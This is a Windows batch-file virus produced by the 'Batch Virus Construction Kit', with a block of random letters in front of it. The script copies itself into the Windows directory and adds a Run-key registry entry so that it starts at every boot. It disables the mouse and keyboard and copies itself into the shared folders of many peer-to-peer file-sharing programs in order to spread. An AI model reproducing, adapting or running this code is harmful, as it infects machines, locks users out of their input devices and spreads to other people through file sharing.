hgueptbfjycmpdzohunzfnrpmtlcobcsighgvlqlpmvhznibzzacbrndldgwriitapzxrpcjyxcuoozbnxpgxxidghxjylkotb
ocanoovaoagnzbhjwosofdhbbogqlpylsyuldnqqvzytposcnyjwiryekoneqmymalwrbutmptnlydfyfnvcwhqlnirjdqgafp
dnlwpjnhyyeiepohypxnuqdxpmdsfuylogmjqbgrcnkqzxhgqprwuowjevsdgovbzchsejkywlwpcqznukhwayksjqbnuenljk
ansasdfzssxojajhycxpkybgjifjsqplwhpwufylapulawfntbwhledxtdxxaqplyogqhhbdasdcrbhkxgivhjnxklhqenftlv
bdwjlgvqliyqlfogqznocmlvvgthkqnrmdelzdpvavmqqfvognvvvzatvqkzbihpwkxppcnximzbtrxsngwdorivumwrceydrt
rweititzbysyyhyxhofvmnapshlkqvgydgqekrsejjjgctvitdssrkaurzyinfbuztxxrmpuphswmrqgxwzpbzevisnftumavm
wvsfurjuociotmkuwvuuvmkndjmdxlkkkermuojxwftypuxzhpzjlnnkqawsuvgomfrtxfgqonxkpzbkfhwgltimzncdmzdazh
xpplrbmgykcuodmcnyeymsacgwkrqutroogbgdpsbnoaaeaidacwrerbomzqmwupsdgurzufigjmcpthxzoinwwrdnptgjyjpw
blqnzaaexxmkofyjadsvmfelrsqfdhihausxbjeuqdupjkkrwzwcmzuwqjhnhqbxpppbxpaqxwshcelnnsrrsfegwlxihqyher
zcmzsfezxkpufjjctqcglftsbpaqezdvlzrtkcuezcvnxtvxuaojuesamklxwlxtsvjgfvfgqhrqrfhyluyvjtecutlsfhxilo
::
:: Generated by Batch Virus Construction Kit 0.3 [DvL]-[rRLF]
:: Created by DvL
::
@echo off
@ver|find "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\xjwzrhov.bat>nul
echo.REGEDIT4>%windir%\xjwzrhov.reg
echo.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run-]>>%windir%\xjwzrhov.reg
echo."xjwzrhov"="%windir%\xjwzrhov.bat">>%windir%\xjwzrhov.reg
regedit /s %windir%\xjwzrhov.reg
rundll32 mouse,disable
rundll32 keyboard,disable
copy %0 c:\kazaa\myshar~1\xjwzrhov.bat>nul
copy %0 c:\mydown~1\xjwzrhov.bat>nul
copy %0 c:\mydocu~1\xjwzrhov.bat>nul
copy %0 c:\eigene~1\xjwzrhov.bat>nul
copy %0 c:\progra~1\applej~1\incoming\xjwzrhov.bat>nul
copy %0 c:\progra~1\bearsh~1\shared\xjwzrhov.bat>nul
copy %0 c:\progra~1\edonke~1\incoming\xjwzrhov.bat>nul
copy %0 c:\progra~1\emule\incoming\xjwzrhov.bat>nul
copy %0 c:\progra~1\grokster\mygrok~1\xjwzrhov.bat>nul
copy %0 c:\progra~1\icq\shared~1\xjwzrhov.bat>nul
copy %0 c:\progra~1\kazaa\myshar~1\xjwzrhov.bat>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\xjwzrhov.bat>nul
copy %0 c:\progra~1\kmd\myshar~1\xjwzrhov.bat>nul
copy %0 c:\progra~1\limewire\shared\xjwzrhov.bat>nul
copy %0 c:\progra~1\morpheus\myshar~1\xjwzrhov.bat>nul
copy %0 c:\progra~1\overnet\bundles\xjwzrhov.bat>nul
cls
